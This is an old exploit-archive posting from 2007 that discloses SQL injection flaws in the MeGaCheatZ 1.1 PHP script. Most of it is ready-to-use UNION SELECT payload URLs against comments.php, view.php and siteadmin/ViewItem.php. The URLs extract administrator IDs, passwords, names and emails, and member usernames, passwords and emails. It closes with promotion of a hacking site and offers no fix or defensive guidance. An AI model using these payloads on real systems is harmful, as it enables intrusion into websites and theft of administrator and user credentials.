MeGaCheatZ 1.1 Multiple Remote SQL Injection Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MeGaCheatZ 1.1 Multiple Remote SQL Injection Vulnerabilities
# Published : 2007-12-24
# Author : MhZ91
# Previous Title : WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability
# Next Title : CuteNews <= 1.4.5 Admin Password md5 Hash Fetching Exploit

---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |_______    _____/  |_          /_   |/  |_ 
 |   |/        |  | _(__  <_/ ___   __  ______  |      __
 |   |   |     |  |/         ___|  |   /_____/  |   ||  |  
 |___|___|  /__|  /______  /___  >__|            |___||__|  
          /______|      /     /                           
---------------------------------------------------------------

Http://www.inj3ct-it.org	    Staff[at]inj3ct-it[dot]org	

---------------------------------------------------------------

	Multiple Remote Sql Injection

---------------------------------------------------------------

# Author: MhZ91 
# Title: MeGaCheatZ v1.1 - Remote Sql Injection
# Download: http://scriptmafia.org/2007/12/19/megacheatz_1.1.html
# Bug: Remote Sql Injection 
# Visit: http://www.inj3ct-it.org
# Info: MeGaCheatZ v1.1 is a full-fledged computer game cheats script. This script could VERY EASILY be an entire web-site. It's 100% cgi/php/template driven. It contains a script that will pull all of the latest PC games cheats FOR you! It also has manual submission and removal! This script does ALL of the work for you. Visitors can even search for specific games!

---------------------------------------------------------------

http://[site]/comments.php?ItemID=-1+union+select+concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail)+from+dd_admin/*

http://[site]/view.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10+from+dd_admin/*

http://[site]/siteadmin/ViewItem.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_admin/*

And other more... 

Whit this u get  AdminID:AdminPass:AdminName:AdminEmail 

If u want get username:password:email of members, use this

http://[site]/comments.php?ItemID=-1+union+select+concat(username,char(58),password,char(58),email)+from+dd_users+where+UserID=[UserID]/*

http://[site]/view.php?ItemID='+union+select+1,2,3,4,concat(username,char(58),password,char(58),email),6,7,8,9,10+from+dd_users+where+UserID=[UserID]/*

http://[site]/siteadmin/ViewItem.php?ItemID='+union+select+1,2,3,4,concat(username,char(58),password,char(58),email),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_users+where+UserID=[UserID]/*

And change [UserID] whit number id of member.. 

Bye.. visit http://www.inj3ct-it.org !!

---------------------------------------------------------------

# www.Syue.com [2007-12-24]